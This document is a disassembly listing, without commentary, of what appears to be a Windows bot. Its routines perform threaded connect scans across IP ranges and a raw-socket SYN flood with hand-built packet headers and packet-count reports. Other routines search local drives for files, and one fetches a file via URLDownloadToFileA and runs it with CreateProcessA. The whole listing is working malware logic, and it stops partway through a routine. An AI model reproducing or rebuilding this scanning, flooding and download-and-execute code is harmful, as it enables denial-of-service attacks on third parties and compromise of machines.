jz short locret_402EA9
jmp eax
; ---------------------------------------------------------------------------
locret_402EA9: ; CODE XREF: sub_402E88+D�j
; sub_402E88+1D�j
retn
sub_402E88 endp
; =============== S U B R O U T I N E =======================================
sub_402EAA proc near ; CODE XREF: sub_40258D:loc_402747�p
; sub_4027CB:loc_4029D8�p
cmp dword_4019B4, 1
jnz short locret_402EFC
push ebx
push esi
xor esi, esi
push edi
mov edi, dword_401064
push esi
push esi
mov ebx, offset sub_402F08
push 8B00h
push ebx
push esi
push esi
mov dword_4019B4, esi
call edi ; CreateThread
push esi
push esi
push 0BD01h
push ebx
push esi
push esi
call edi ; CreateThread
push esi
push esi
push 18B00h
push ebx
push esi
push esi
call edi ; CreateThread
push esi
push esi
push 1BD01h
push ebx
push esi
push esi
call edi ; CreateThread
pop edi
pop esi
pop ebx
locret_402EFC: ; CODE XREF: sub_402EAA+7�j
retn
sub_402EAA endp
; =============== S U B R O U T I N E =======================================
sub_402EFD proc near ; CODE XREF: sub_4027CB:loc_402916�p
mov dword_4019B4, 1
retn
sub_402EFD endp
; =============== S U B R O U T I N E =======================================
sub_402F08 proc near ; DATA XREF: sub_402EAA+16�o
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push edi
call dword_401068 ; GetCurrentThreadId
mov edi, eax
call dword_4010B4 ; GetTickCount
xor edi, eax
mov eax, dword_4014C0
cmp eax, 0FFFFFFFFh
jnz short loc_402F2B
mov eax, edi
shl eax, 10h
jmp short loc_402F39
; ---------------------------------------------------------------------------
loc_402F2B: ; CODE XREF: sub_402F08+1A�j
xor ecx, ecx
mov ch, al
movzx eax, ah
or ecx, eax
shl ecx, 10h
mov eax, ecx
loc_402F39: ; CODE XREF: sub_402F08+21�j
mov ecx, 0FFFF0000h
test [esp+8+arg_0], ecx
jnz short loc_402F4E
mov [esp+8+var_4], 0FF00h
jmp short loc_402F5B
; ---------------------------------------------------------------------------
loc_402F4E: ; CODE XREF: sub_402F08+3A�j
mov ecx, 0FF000000h
mov [esp+8+var_4], 0FFFF00h
loc_402F5B: ; CODE XREF: sub_402F08+44�j
cmp dword_4019B4, 0
jnz short loc_402FBC
push ebx
mov ebx, dword_4010D4
push ebp
mov ebp, ecx
push esi
and ebp, eax
loc_402F71: ; CODE XREF: sub_402F08+AF�j
mov esi, [esp+14h+var_4]
push 400h
and esi, edi
or esi, ebp
call ebx ; Sleep
lea edi, [esi+100h]
loc_402F86: ; CODE XREF: sub_402F08+96�j
cmp esi, edi
jnb short loc_402FA0
push [esp+14h+arg_0]
push esi
call sub_402FC3
push 200h
call ebx ; Sleep
add esi, 20h
jmp short loc_402F86
; ---------------------------------------------------------------------------
loc_402FA0: ; CODE XREF: sub_402F08+80�j
call dword_401068 ; GetCurrentThreadId
mov edi, eax
call dword_4010B4 ; GetTickCount
xor edi, eax
cmp dword_4019B4, 0
jz short loc_402F71
pop esi
pop ebp
pop ebx
loc_402FBC: ; CODE XREF: sub_402F08+5A�j
xor eax, eax
pop edi
pop ecx
retn 4
sub_402F08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FC3 proc near ; CODE XREF: sub_402F08+87�p
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_A0 = byte ptr -0A0h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2A8h
mov ax, word ptr [ebp+arg_4]
push ebx
push esi
xor ebx, ebx
push edi
mov [ebp+var_8], 1
mov [ebp+var_1A4], ebx
mov [ebp+var_2A8], ebx
mov [ebp+var_20], 2
mov [ebp+var_1E], ax
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
lea edi, [ebp+var_A0]
mov [ebp+arg_4], 20h
loc_403005: ; CODE XREF: sub_402FC3+D8�j
push 6
push 1
push 2
call dword_401128 ; socket
mov esi, eax
lea eax, [ebp+var_8]
push eax
push 8004667Eh
push esi
mov [edi], esi
call dword_401164 ; ioctlsocket
mov ecx, [ebp+var_1A4]
xor eax, eax
cmp ecx, ebx
jbe short loc_403043
lea edx, [ebp+var_1A0]
loc_403037: ; CODE XREF: sub_402FC3+7E�j
cmp [edx], esi
jz short loc_403043
inc eax
add edx, 4
cmp eax, ecx
jb short loc_403037
loc_403043: ; CODE XREF: sub_402FC3+6C�j
; sub_402FC3+76�j
cmp eax, ecx
jnz short loc_403059
cmp ecx, 40h
jnb short loc_403059
mov [ebp+eax*4+var_1A0], esi
inc [ebp+var_1A4]
loc_403059: ; CODE XREF: sub_402FC3+82�j
; sub_402FC3+87�j
mov edx, [ebp+var_2A8]
xor eax, eax
cmp edx, ebx
jbe short loc_403077
lea ecx, [ebp+var_2A4]
loc_40306B: ; CODE XREF: sub_402FC3+B2�j
cmp [ecx], esi
jz short loc_403077
inc eax
add ecx, 4
cmp eax, edx
jb short loc_40306B
loc_403077: ; CODE XREF: sub_402FC3+A0�j
; sub_402FC3+AA�j
cmp eax, edx
jnz short loc_40308D
cmp edx, 40h
jnb short loc_40308D
mov [ebp+eax*4+var_2A4], esi
inc [ebp+var_2A8]
loc_40308D: ; CODE XREF: sub_402FC3+B6�j
; sub_402FC3+BB�j
push 10h
call dword_4010D4 ; Sleep
add edi, 4
dec [ebp+arg_4]
jnz loc_403005
mov ebx, dword_401168
xor esi, esi
lea edi, [ebp+var_A0]
loc_4030AF: ; CODE XREF: sub_402FC3+10C�j
mov eax, [ebp+arg_0]
add eax, esi
push eax
call ebx ; htonl
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push 10h
push eax
push dword ptr [edi]
call dword_401130 ; connect
inc esi
add edi, 4
cmp esi, 20h
jl short loc_4030AF
push 1400h
call dword_4010D4 ; Sleep
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2A8]
push 0
push eax
lea eax, [ebp+var_1A4]
push eax
push 0
call dword_40113C ; select
mov [ebp+var_4], eax
lea esi, [ebp+var_A0]
mov [ebp+arg_4], 20h
loc_403108: ; CODE XREF: sub_402FC3+17F�j
mov edi, [esi]
push edi
call dword_401144 ; closesocket
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_403139
lea eax, [ebp+var_1A4]
push eax
push edi
call sub_404648 ; __WSAFDIsSet
test eax, eax
jnz short loc_40313C
lea eax, [ebp+var_2A8]
push eax
push edi
call sub_404648 ; __WSAFDIsSet
test eax, eax
jnz short loc_40313C
loc_403139: ; CODE XREF: sub_402FC3+152�j
or dword ptr [esi], 0FFFFFFFFh
loc_40313C: ; CODE XREF: sub_402FC3+163�j
; sub_402FC3+174�j
add esi, 4
dec [ebp+arg_4]
jnz short loc_403108
xor esi, esi
lea edi, [ebp+var_A0]
loc_40314C: ; CODE XREF: sub_402FC3+1B9�j
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_403175
mov eax, [ebp+arg_0]
push 0
add eax, esi
push 0
push eax
call ebx ; htonl
push eax
push offset sub_40442C
push 0
push 0
call dword_401064 ; CreateThread
push 8
call dword_4010D4 ; Sleep
loc_403175: ; CODE XREF: sub_402FC3+18C�j
inc esi
add edi, 4
cmp esi, 20h
jl short loc_40314C
pop edi
pop esi
pop ebx
leave
retn 8
sub_402FC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403185 proc near ; CODE XREF: sub_40258D+9B�p
; sub_403185+50�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov al, [edi]
test al, al
jz short loc_4031F6
mov esi, [ebp+arg_4]
lea ecx, [edi+1]
mov [ebp+arg_0], ecx
loc_40319D: ; CODE XREF: sub_403185+64�j
cmp al, 2Ah
jz short loc_4031D1
cmp al, 3Fh
jz short loc_4031CA
mov ebx, dword_4010F8
movzx eax, al
push eax
call ebx ; CharUpperA
mov edx, eax
movzx eax, byte ptr [esi]
push eax
mov [ebp+arg_4], edx
call ebx ; CharUpperA
mov ecx, [ebp+arg_4]
cmp ecx, eax
jnz short loc_4031ED
loc_4031C3: ; CODE XREF: sub_403185+4A�j
inc esi
inc edi
inc [ebp+arg_0]
jmp short loc_4031E5
; ---------------------------------------------------------------------------
loc_4031CA: ; CODE XREF: sub_403185+1E�j
cmp byte ptr [esi], 0
jz short loc_4031ED
jmp short loc_4031C3
; ---------------------------------------------------------------------------
loc_4031D1: ; CODE XREF: sub_403185+1A�j
push esi
push [ebp+arg_0]
call sub_403185
cmp eax, 1
jz short loc_4031F1
cmp byte ptr [esi], 0
jz short loc_4031ED
inc esi
loc_4031E5: ; CODE XREF: sub_403185+43�j
mov al, [edi]
test al, al
jnz short loc_40319D
jmp short loc_4031F9
; ---------------------------------------------------------------------------
loc_4031ED: ; CODE XREF: sub_403185+3C�j
; sub_403185+48�j ...
xor eax, eax
jmp short loc_403200
; ---------------------------------------------------------------------------
loc_4031F1: ; CODE XREF: sub_403185+58�j
push 1
pop eax
jmp short loc_403200
; ---------------------------------------------------------------------------
loc_4031F6: ; CODE XREF: sub_403185+D�j
mov esi, [ebp+arg_4]
loc_4031F9: ; CODE XREF: sub_403185+66�j
xor eax, eax
cmp [esi], al
setz al
loc_403200: ; CODE XREF: sub_403185+6A�j
; sub_403185+6F�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
sub_403185 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403207 proc near ; CODE XREF: sub_4027CB+268�p
var_108 = dword ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
push esi
push 104h
push [ebp+arg_0]
lea eax, [ebp+var_104]
xor esi, esi
push eax
mov [ebp+var_108], esi
call dword_4010BC ; lstrcpyn
push esi
lea eax, [ebp+var_108]
push esi
push eax
push offset sub_40325F
push esi
push esi
call dword_401064 ; CreateThread
test eax, eax
jz short loc_40325A
loc_403248: ; CODE XREF: sub_403207+51�j
cmp [ebp+var_108], esi
jnz short loc_40325A
push 8
call dword_4010D4 ; Sleep
jmp short loc_403248
; ---------------------------------------------------------------------------
loc_40325A: ; CODE XREF: sub_403207+3F�j
; sub_403207+47�j
pop esi
leave
retn 4
sub_403207 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40325F proc near ; DATA XREF: sub_403207+30�o
var_308 = byte ptr -308h
var_108 = byte ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 308h
push esi
mov esi, [ebp+arg_0]
push 108h
lea eax, [ebp+var_108]
push esi
push eax
call sub_402E0E
mov dword ptr [esi], 1
lea eax, [ebp+var_308]
mov esi, 200h
push eax
push esi
call dword_401074 ; GetLogicalDriveStringsA
test eax, eax
jz short loc_4032D9
cmp eax, esi
ja short loc_4032D9
cmp [ebp+var_308], 0
lea esi, [ebp+var_308]
jz short loc_4032D9
loc_4032AE: ; CODE XREF: sub_40325F+78�j
push esi
call dword_4010D8 ; GetDriveTypeA
cmp eax, 3
jnz short loc_4032C7
lea eax, [ebp+var_104]
push eax
push esi
call sub_4032E0
loc_4032C7: ; CODE XREF: sub_40325F+59�j
push esi
call dword_40106C ; lstrlen
cmp byte ptr [esi+eax+1], 0
lea esi, [esi+eax+1]
jnz short loc_4032AE
loc_4032D9: ; CODE XREF: sub_40325F+3A�j
; sub_40325F+3E�j ...
xor eax, eax
pop esi
leave
retn 4
sub_40325F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4032E0 proc near ; CODE XREF: sub_40325F+63�p
; sub_4032E0+B3�p
var_540 = byte ptr -540h
var_340 = byte ptr -340h
var_140 = dword ptr -140h
var_114 = byte ptr -114h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 540h
push ebx
push esi
push edi
mov edi, dword_401110
push [ebp+arg_0]
lea eax, [ebp+var_340]
push offset a_256s ; "%.256s*"
push eax
call edi ; wsprintfA
mov esi, dword_401080
add esp, 0Ch
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_340]
push eax
call esi ; FindFirstFileA
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_340]
push eax
call esi ; FindFirstFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4033F2
mov esi, dword_4010B0
loc_40333D: ; CODE XREF: sub_4032E0+105�j
mov eax, [ebp+var_140]
and eax, 10h
cmp al, 10h
jnz short loc_40339A
lea eax, [ebp+var_114]
push offset a_ ; "."
push eax
call esi ; lstrcmp
test eax, eax
jz short loc_4033D5
lea eax, [ebp+var_114]
push offset a__ ; ".."
push eax
call esi ; lstrcmp
test eax, eax
jz short loc_4033D5
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_340]
push [ebp+arg_0]
push offset a_256s_250s ; "%.256s%.250s\\"
push eax
call edi ; wsprintfA
add esp, 10h
lea eax, [ebp+var_340]
push [ebp+arg_4]
push eax
call sub_4032E0
jmp short loc_4033D5
; ---------------------------------------------------------------------------
loc_40339A: ; CODE XREF: sub_4032E0+68�j
lea eax, [ebp+var_114]
push eax
push [ebp+arg_4]
call sub_403185
cmp eax, 1
jnz short loc_4033D5
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_540]
push [ebp+arg_0]
push offset aFindfile_256s_ ; "[findfile] %.256s%.240s"
push eax
call edi ; wsprintfA
add esp, 10h
lea eax, [ebp+var_540]
push eax
call sub_40254D
loc_4033D5: ; CODE XREF: sub_4032E0+7A�j
; sub_4032E0+8C�j ...
lea eax, [ebp+var_140]
push eax
push ebx
call dword_40107C ; FindNextFileA
test eax, eax
jnz loc_40333D
push ebx
call dword_401078 ; FindClose
loc_4033F2: ; CODE XREF: sub_4032E0+51�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_4032E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033F9 proc near ; CODE XREF: sub_4027CB+257�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push 20h
push [ebp+arg_0]
call sub_402E2E
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jz loc_4034B0
push 20h
lea eax, [ebp+var_24]
push [ebp+arg_0]
mov [esi], bl
inc esi
push eax
call dword_4010BC ; lstrcpyn
push 20h
push esi
call sub_402E2E
cmp eax, ebx
jz short loc_4034B0
mov [eax], bl
inc eax
mov word ptr [ebp+var_4], bx
loc_40343C: ; CODE XREF: sub_4033F9+62�j
cmp [esi], bl
jz short loc_40345D
mov ecx, [ebp+var_4]
lea ecx, [ecx+ecx*4]
shl ecx, 1
mov word ptr [ebp+var_4], cx
movzx dx, byte ptr [esi]
sub edx, 30h
add cx, dx
inc esi
mov word ptr [ebp+var_4], cx
jmp short loc_40343C
; ---------------------------------------------------------------------------
loc_40345D: ; CODE XREF: sub_4033F9+45�j
xor ecx, ecx
mov [ebp+var_28], ecx
loc_403462: ; CODE XREF: sub_4033F9+80�j
cmp [eax], bl
jz short loc_40347B
lea ecx, [ecx+ecx*4]
shl ecx, 1
mov [ebp+var_28], ecx
movzx edx, byte ptr [eax]
inc eax
lea ecx, [ecx+edx-30h]
mov [ebp+var_28], ecx
jmp short loc_403462
; ---------------------------------------------------------------------------
loc_40347B: ; CODE XREF: sub_4033F9+6B�j
mov eax, [ebp+arg_4]
push ebx
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push ebx
push eax
push offset sub_4034C1
push ebx
push ebx
mov [ebp+var_30], ebx
mov dword_4014B0, ebx
call dword_401064 ; CreateThread
test eax, eax
jz short loc_4034B0
loc_4034A1: ; CODE XREF: sub_4033F9+B5�j
cmp [ebp+var_30], ebx
jnz short loc_4034B0
push 8
call dword_4010D4 ; Sleep
jmp short loc_4034A1
; ---------------------------------------------------------------------------
loc_4034B0: ; CODE XREF: sub_4033F9+18�j
; sub_4033F9+3A�j ...
pop esi
pop ebx
leave
retn 8
sub_4033F9 endp
; =============== S U B R O U T I N E =======================================
sub_4034B6 proc near ; CODE XREF: sub_4027CB+C6�p
mov dword_4014B0, 1
retn
sub_4034B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034C1 proc near ; DATA XREF: sub_4033F9+8E�o
var_2D8 = byte ptr -2D8h
var_D8 = byte ptr -0D8h
var_D4 = dword ptr -0D4h
var_C8 = byte ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = byte ptr -0BCh
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_90 = byte ptr -90h
var_8E = word ptr -8Eh
var_84 = byte ptr -84h
var_74 = word ptr -74h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D8h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 0Bh
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
movsw
push 1
pop esi
push 0FFh
push 3
push 2
mov [eax], esi
call dword_401128 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_403778
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push 0
push eax
mov [ebp+var_34], esi
call dword_40116C ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_403778
lea eax, [ebp+var_BC]
push eax
call dword_401120 ; inet_addr
mov ebx, eax
lea eax, [ebp+var_4C]
and [ebp+var_2E], 0
push eax
lea eax, [ebp+var_D8]
mov [ebp+var_30], 2
push eax
mov [ebp+var_2C], ebx
push dword_4014BC
mov [ebp+var_4C], 10h
call dword_401138 ; getsockname
cmp eax, 0FFFFFFFFh
jz loc_403778
mov esi, dword_4010B4
call esi ; GetTickCount
and [ebp+var_42], 0
and [ebp+var_3E], 0
mov edi, eax
mov [ebp+var_48], 45h
shl edi, 18h
xor edi, [ebp+var_D4]
mov [ebp+var_46], 2800h
mov [ebp+var_44], 1
mov [ebp+var_40], 80h
mov [ebp+var_3F], 6
call esi ; GetTickCount
xor eax, 95EC27A5h
mov [ebp+var_13], 2
mov [ebp+var_1C], eax
xor eax, eax
and [ebp+var_50], al
cmp word ptr [ebp+var_9C], ax
mov [ebp+var_18], eax
mov [ebp+var_14], 50h
mov [ebp+var_12], 2
mov [ebp+var_E], ax
mov [ebp+var_10], ax
mov [ebp+var_4F], 6
mov [ebp+var_4E], 1400h
mov [ebp+var_38], ebx
mov [ebp+var_54], ebx
mov [ebp+var_3C], edi
mov [ebp+var_58], edi
jnz short loc_4035E0
call esi ; GetTickCount
jmp short loc_4035EC
; ---------------------------------------------------------------------------
loc_4035E0: ; CODE XREF: sub_4034C1+119�j
push [ebp+var_9C]
call dword_40115C ; htons
loc_4035EC: ; CODE XREF: sub_4034C1+11D�j
mov [ebp+var_1E], ax
call esi ; GetTickCount
xor eax, 82E4h
push 0Ch
mov [ebp+var_20], ax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_90]
push eax
call sub_402E0E
lea eax, [ebp+var_20]
push 14h
push eax
lea eax, [ebp+var_84]
push eax
call sub_402E0E
lea eax, [ebp+var_90]
push 20h
push eax
call sub_403781
mov [ebp+var_74], ax
lea eax, [ebp+var_48]
push 14h
push eax
lea eax, [ebp+var_98]
push eax
call sub_402E0E
lea eax, [ebp+var_98]
push 28h
push eax
call sub_403781
mov [ebp+var_8E], ax
mov [ebp+var_C], 1
call esi ; GetTickCount
mov edi, [ebp+var_C0]
mov dword ptr [ebp+var_8+4], eax
imul edi, 3E8h
add edi, eax
lea eax, [ebp+var_30]
mov ebx, dword_401160
push 10h
push eax
push 0
lea eax, [ebp+var_98]
push 28h
push eax
push [ebp+arg_0]
call ebx ; sendto
cmp eax, 0FFFFFFFFh
jz loc_403778
loc_403697: ; CODE XREF: sub_4034C1+241�j
call esi ; GetTickCount
cmp eax, edi
jnb short loc_403704
cmp dword_4014B0, 0
jnz short loc_403704
lea eax, [ebp+var_30]
push 10h
push eax
push 0
lea eax, [ebp+var_98]
push 28h
push eax
push [ebp+arg_0]
call ebx ; sendto
lea eax, [ebp+var_30]
push 10h
push eax
push 0
lea eax, [ebp+var_98]
push 28h
push eax
push [ebp+arg_0]
call ebx ; sendto
lea eax, [ebp+var_30]
push 10h
push eax
push 0
lea eax, [ebp+var_98]
push 28h
push eax
push [ebp+arg_0]
call ebx ; sendto
lea eax, [ebp+var_30]
push 10h
push eax
push 0
lea eax, [ebp+var_98]
push 28h
push eax
push [ebp+arg_0]
call ebx ; sendto
add [ebp+var_C], 4
jmp short loc_403697
; ---------------------------------------------------------------------------
loc_403704: ; CODE XREF: sub_4034C1+1DA�j
; sub_4034C1+1E3�j
call esi ; GetTickCount
push [ebp+arg_0]
mov esi, eax
sub esi, dword ptr [ebp+var_8+4]
call dword_401144 ; closesocket
xor edx, edx
cmp [ebp+var_C4], edx
jnz short loc_403778
mov ecx, [ebp+var_C]
mov dword ptr [ebp+var_8+4], edx
lea eax, [ecx+ecx*4]
shl eax, 3
mov edi, eax
shr edi, 0Ah
mov dword ptr [ebp+var_8], edi
fild [ebp+var_8]
mov dword ptr [ebp+var_8], esi
mov dword ptr [ebp+var_8+4], edx
shr eax, 14h
fidiv dword ptr [ebp+var_8]
fmul flt_401E48
fistp [ebp+var_8]
push dword ptr [ebp+var_8]
push eax
push ecx
lea eax, [ebp+var_BC]
push esi
push eax
lea eax, [ebp+var_2D8]
push offset aSyn_16sDoneUms ; "[syn:%.16s] done [%ums] [%u packets] [%"...
push eax
call dword_401110 ; wsprintfA
add esp, 1Ch
lea eax, [ebp+var_2D8]
push eax
call sub_40254D
loc_403778: ; CODE XREF: sub_4034C1+38�j
; sub_4034C1+55�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_4034C1 endp
; =============== S U B R O U T I N E =======================================
sub_403781 proc near ; CODE XREF: sub_4034C1+167�p
; sub_4034C1+18B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor ecx, ecx
cmp esi, 2
jb short loc_4037A5
mov eax, [esp+4+arg_0]
mov edx, esi
push edi
shr edx, 1
loc_403796: ; CODE XREF: sub_403781+1F�j
movzx edi, word ptr [eax]
add ecx, edi
inc eax
inc eax
dec esi
dec esi
dec edx
jnz short loc_403796
pop edi
jmp short loc_4037A9
; ---------------------------------------------------------------------------
loc_4037A5: ; CODE XREF: sub_403781+A�j
mov eax, [esp+4+arg_0]
loc_4037A9: ; CODE XREF: sub_403781+22�j
test esi, esi
pop esi
jz short loc_4037B3
movzx eax, byte ptr [eax]
add ecx, eax
loc_4037B3: ; CODE XREF: sub_403781+2B�j
mov edx, ecx
and ecx, 0FFFFh
shr edx, 10h
add edx, ecx
mov eax, edx
shr eax, 10h
add eax, edx
not eax
retn 8
sub_403781 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037CC proc near ; CODE XREF: sub_4027CB+243�p
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 214h
mov eax, [ebp+arg_4]
push esi
mov [ebp+var_210], eax
mov eax, [ebp+arg_8]
push 104h
mov [ebp+var_20C], eax
push [ebp+arg_0]
lea eax, [ebp+var_208]
xor esi, esi
push eax
mov [ebp+var_214], esi
call dword_4010BC ; lstrcpyn
lea eax, [ebp+var_104]
push eax
push esi
push offset dword_4014B4
push offset a_ ; "."
call dword_401084 ; GetTempFileNameA
push esi
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_40384E
push esi
push esi
call dword_401064 ; CreateThread
test eax, eax
jz short loc_403849
loc_403837: ; CODE XREF: sub_4037CC+7B�j
cmp [ebp+var_214], esi
jnz short loc_403849
push 8
call dword_4010D4 ; Sleep
jmp short loc_403837
; ---------------------------------------------------------------------------
loc_403849: ; CODE XREF: sub_4037CC+69�j
; sub_4037CC+71�j
pop esi
leave
retn 0Ch
sub_4037CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40384E proc near ; DATA XREF: sub_4037CC+5A�o
var_398 = byte ptr -398h
var_394 = dword ptr -394h
var_390 = dword ptr -390h
var_38C = byte ptr -38Ch
var_288 = byte ptr -288h
var_184 = byte ptr -184h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 398h
push edi
push offset aUrlmon_dll ; "urlmon.dll"
call dword_401060 ; LoadLibraryA
xor edi, edi
cmp eax, edi
jz loc_403996
push offset aUrldownloadtof ; "URLDownloadToFileA"
push eax
call dword_40105C ; GetProcAddress
cmp eax, edi
mov [ebp+var_4], eax
jz loc_403996
push esi
mov esi, [ebp+arg_0]
push 214h
lea eax, [ebp+var_398]
push esi
push eax
call sub_402E0E
mov dword ptr [esi], 1
call dword_401068 ; GetCurrentThreadId
cmp [ebp+var_390], edi
mov esi, dword_401110
mov [ebp+arg_0], eax
jnz short loc_4038E3
lea ecx, [ebp+var_288]
push ecx
lea ecx, [ebp+var_38C]
push ecx
push eax
lea eax, [ebp+var_184]
push offset aDl08x_180sTo_1 ; "[dl:%08x] %.180s to %.180s"
push eax
call esi ; wsprintfA
add esp, 14h
lea eax, [ebp+var_184]
push eax
call sub_40254D
loc_4038E3: ; CODE XREF: sub_40384E+67�j
push edi
lea eax, [ebp+var_288]
push edi
push eax
lea eax, [ebp+var_38C]
push eax
push edi
call [ebp+var_4]
test eax, eax
jnz short loc_403969
push offset dword_401650
push offset aD ; "D"
push edi
push edi
push 28h
push edi
push edi
lea eax, [ebp+var_288]
push edi
push eax
push edi
call dword_4010AC ; CreateProcessA
cmp eax, 1
jnz short loc_403957
cmp [ebp+var_390], edi
jnz short loc_403947
push [ebp+arg_0]
lea eax, [ebp+var_184]
push offset aDl08x ; "[dl:%08x] :)"
push eax
call esi ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_184]
push eax
call sub_40254D
loc_403947: ; CODE XREF: sub_40384E+D7�j
cmp [ebp+var_394], 1
jnz short loc_403991
call sub_40224E
jmp short loc_403991
; ---------------------------------------------------------------------------
loc_403957: ; CODE XREF: sub_40384E+CF�j
cmp [ebp+var_390], edi
jnz short loc_403991
push [ebp+arg_0]
push offset aDl08xExec ; "[dl:%08x] :( exec"
jmp short loc_403979
; ---------------------------------------------------------------------------
loc_403969: ; CODE XREF: sub_40384E+AB�j
cmp [ebp+var_390], edi
jnz short loc_403991
push [ebp+arg_0]
push offset aDl08xDl ; "[dl:%08x] :( dl"
loc_403979: ; CODE XREF: sub_40384E+119�j
lea eax, [ebp+var_184]
push eax
call esi ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_184]
push eax
call sub_40254D
loc_403991: ; CODE XREF: sub_40384E+100�j
; sub_40384E+107�j ...
xor eax, eax
pop esi
jmp short loc_403998
; ---------------------------------------------------------------------------
loc_403996: ; CODE XREF: sub_40384E+19�j
; sub_40384E+30�j
xor eax, eax
loc_403998: ; CODE XREF: sub_40384E+146�j
pop edi
leave
retn 4
sub_40384E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40399D proc near ; CODE XREF: sub_4027CB+203�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 48h
push ebx
xor ebx, ebx
cmp dword_401A98, ebx
push esi
jz short loc_403A25
push 20h
push [ebp+arg_0]
call sub_402E2E
mov esi, eax
cmp esi, ebx
jz short loc_403A25
push 40h
lea eax, [ebp+var_44]
push [ebp+arg_0]
mov [esi], bl
inc esi
push eax
call dword_4010BC ; lstrcpyn
mov word ptr [ebp+var_4], bx
loc_4039D5: ; CODE XREF: sub_40399D+57�j
cmp [esi], bl
jz short loc_4039F6
mov eax, [ebp+var_4]
lea eax, [eax+eax*4]
shl eax, 1
mov word ptr [ebp+var_4], ax
movzx cx, byte ptr [esi]
sub ecx, 30h
add ax, cx
inc esi
mov word ptr [ebp+var_4], ax
jmp short loc_4039D5
; ---------------------------------------------------------------------------
loc_4039F6: ; CODE XREF: sub_40399D+3A�j
push ebx
lea eax, [ebp+var_48]
push ebx
push eax
push offset sub_403A7A
push ebx
push ebx
mov [ebp+var_48], ebx
mov dword_401A98, ebx
call dword_401064 ; CreateThread
test eax, eax
jz short loc_403A25
loc_403A16: ; CODE XREF: sub_40399D+86�j
cmp [ebp+var_48], ebx
